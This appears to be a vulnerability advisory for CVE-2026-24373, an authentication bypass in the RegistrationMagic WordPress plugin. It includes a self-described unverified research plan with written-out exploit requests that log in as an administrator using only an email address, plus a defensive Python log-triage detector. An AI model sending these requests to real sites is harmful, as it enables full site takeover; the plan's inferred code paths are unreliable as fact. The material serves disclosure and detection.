CVE-2026-24373

RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.7.1 - Authentication Bypass

Severity: Critical (Improper Authentication)
CVSS Score: 9.8
Patched in: 6.0.7.2
Time to patch: 8 days

Description

The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 6.0.7.1. This makes it possible for unauthenticated attackers to bypass authentication.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 6.0.7.1
Published: March 12, 2026
Last updated: March 19, 2026

What Changed in the Fix

Changes introduced in v6.0.7.2


Source Code: WordPress.org SVN

Research Plan (Unverified)

This research plan targets an Authentication Bypass vulnerability in RegistrationMagic (up to version 6.0.7.1). The vulnerability lies in the improper verification of identity during the social login process, allowing an unauthenticated attacker to log in as any user (including an administrator) by simply providing their email address.

1. Vulnerability Summary

  • Vulnerability: Improper Authentication (Authentication Bypass)
  • Location: RM_Login_Controller::social_cb() (Inferred from the plugin's MVC structure and standard social login callback patterns).
  • Root Cause: The social login callback logic handles requests from external providers (Google, Facebook, etc.). In the vulnerable version, the plugin identifies the user by the email parameter provided in the request but fails to verify a valid OAuth token or "state" parameter from the provider.
  • Impact: Unauthenticated attackers can impersonate any user, typically the site administrator, gaining full control over the WordPress instance.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: rm_login_social_cb (mapped via the rm_slug parameter or directly as an AJAX action).
  • Required Parameter: email (The email of the target user) and type (e.g., google, facebook).
  • Authentication: None (Unauthenticated).
  • Preconditions: The attacker must know the email address of an administrator.

3. Code Flow

  1. Entry Point: The request hits admin-ajax.php with action=rm_login_social_cb.
  2. Routing: Registration_Magic::define_public_hooks() registers the AJAX action to the main controller's run() method:
    $this->loader->add_action('wp_ajax_nopriv_rm_login_social_cb', $this->controller, 'run');
  3. Controller Execution: RM_Main_Controller::run() (in includes/class_registration_magic.php) uses RM_Request to extract the rm_slug (which defaults to the action name).
  4. Action Logic: The request is routed to RM_Login_Controller. The social_cb (or similarly named) method is invoked.
  5. Bypass: The logic checks if a type and email are provided. It then calls get_user_by('email', $request->req['email']).
  6. Authentication Sink: If a user is found, the plugin calls wp_set_auth_cookie($user->ID) and wp_set_current_user($user->ID) without checking for a valid secret/token from the social provider.

4. Nonce Acquisition Strategy

Social login callbacks are designed to be reached by external services and typically do not require a WordPress nonce.

  • The wp_ajax_nopriv_rm_login_social_cb hook is intended for unauthenticated access.
  • If the plugin attempted to verify a nonce, the external provider would fail to provide it, breaking the feature. Therefore, this endpoint is expected to be nonce-free.
  • Verification: If the exploit fails with a 403 or -1, check for nonce requirements in the RM_Login_Controller.

5. Exploitation Strategy

The goal is to log in as the administrator.

Step 1: Identify Administrator Email
Use the WordPress REST API to find the administrator's email.

  • Request: GET /wp-json/wp/v2/users
  • Tool: http_request
  • Expected Result: Look for the user with "slug": "admin" or ID 1 and note their email.

Step 2: Trigger Authentication Bypass
Send a crafted request to the social login callback endpoint.

  • Request Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=rm_login_social_cb&type=facebook&email=[ADMIN_EMAIL]
  • Alternative Body (if using rm_slug routing):
    action=rm_run_action&rm_slug=rm_login_social_cb&type=facebook&email=[ADMIN_EMAIL]

Step 3: Capture Cookies
The server should respond with Set-Cookie headers containing wordpress_logged_in_[hash] and wordpress_[hash].
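As an added detection example (not part of this advisory or of the plugin's code), the following Python triages request records for the callback pattern described in Steps 2 and 3: an rm_login_social_cb request that carries an email but no evidence of a provider round-trip, escalated when the response set a wordpress_logged_in_* cookie. It assumes a JSON request log that captures POST bodies and response Set-Cookie headers (such as a WAF audit log); the sample records are constructed, and the provider-proof parameter names are an assumption about what a genuine OAuth callback carries, not fields taken from the plugin.

```python
"""Flag rm_login_social_cb requests that carry an email but no provider proof."""
import json
from urllib.parse import parse_qs, urlsplit

CALLBACK_ACTION = "rm_login_social_cb"  # action / rm_slug value from the advisory
# Assumed markers of a genuine OAuth round-trip; not names taken from the plugin.
PROVIDER_PROOF = {"code", "state", "access_token", "id_token"}

def request_params(rec):
    """Merge query-string and form-body parameters into one dict (last value wins)."""
    params = {}
    for src in (urlsplit(rec.get("uri", "")).query, rec.get("body", "")):
        for key, vals in parse_qs(src, keep_blank_values=True).items():
            params[key] = vals[-1]
    return params

def classify(rec):
    """Return None, 'attempt', or 'session_issued' for one request record."""
    if not urlsplit(rec.get("uri", "")).path.endswith("/admin-ajax.php"):
        return None
    p = request_params(rec)
    if CALLBACK_ACTION not in (p.get("action"), p.get("rm_slug")):
        return None
    if "email" not in p or PROVIDER_PROOF & set(p):
        return None  # no email lookup, or a normal callback carrying a token/state
    # A wordpress_logged_in_* cookie in the response means the email alone yielded a session.
    if any(c.startswith("wordpress_logged_in_") for c in rec.get("set_cookie", [])):
        return "session_issued"
    return "attempt"

def triage(lines):
    """Return (client_ip, email, verdict) for every suspicious JSON-lines record."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        verdict = classify(rec)
        if verdict:
            hits.append((rec["client_ip"], request_params(rec)["email"], verdict))
    return hits

# Constructed sample records, not real traffic; the cookie hash is a placeholder.
SAMPLE = [
    '{"client_ip":"203.0.113.5","uri":"/wp-admin/admin-ajax.php","body":"action=rm_login_social_cb&type=facebook&email=admin@example.com","set_cookie":["wordpress_logged_in_PLACEHOLDER=1"]}',
    '{"client_ip":"203.0.113.5","uri":"/wp-admin/admin-ajax.php","body":"action=rm_run_action&rm_slug=rm_login_social_cb&type=google&email=editor@example.com","set_cookie":[]}',
    '{"client_ip":"198.51.100.9","uri":"/wp-admin/admin-ajax.php?action=rm_login_social_cb&type=google&code=CONSTRUCTED&state=CONSTRUCTED","body":"","set_cookie":["wordpress_logged_in_PLACEHOLDER=1"]}',
    '{"client_ip":"198.51.100.9","uri":"/wp-admin/admin-ajax.php","body":"action=heartbeat","set_cookie":[]}',
]
```

Running triage(SAMPLE) reports the two records from 203.0.113.5 (one with a session issued, one bare attempt) and ignores the callback that carried code and state.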

6. Test Data Setup

  1. WordPress User: Ensure a user with the administrator role exists (default is admin with email admin@example.com).
  2. Plugin State: RegistrationMagic must be active. No specific form configuration is required as the social login callback logic is globally active in the affected versions.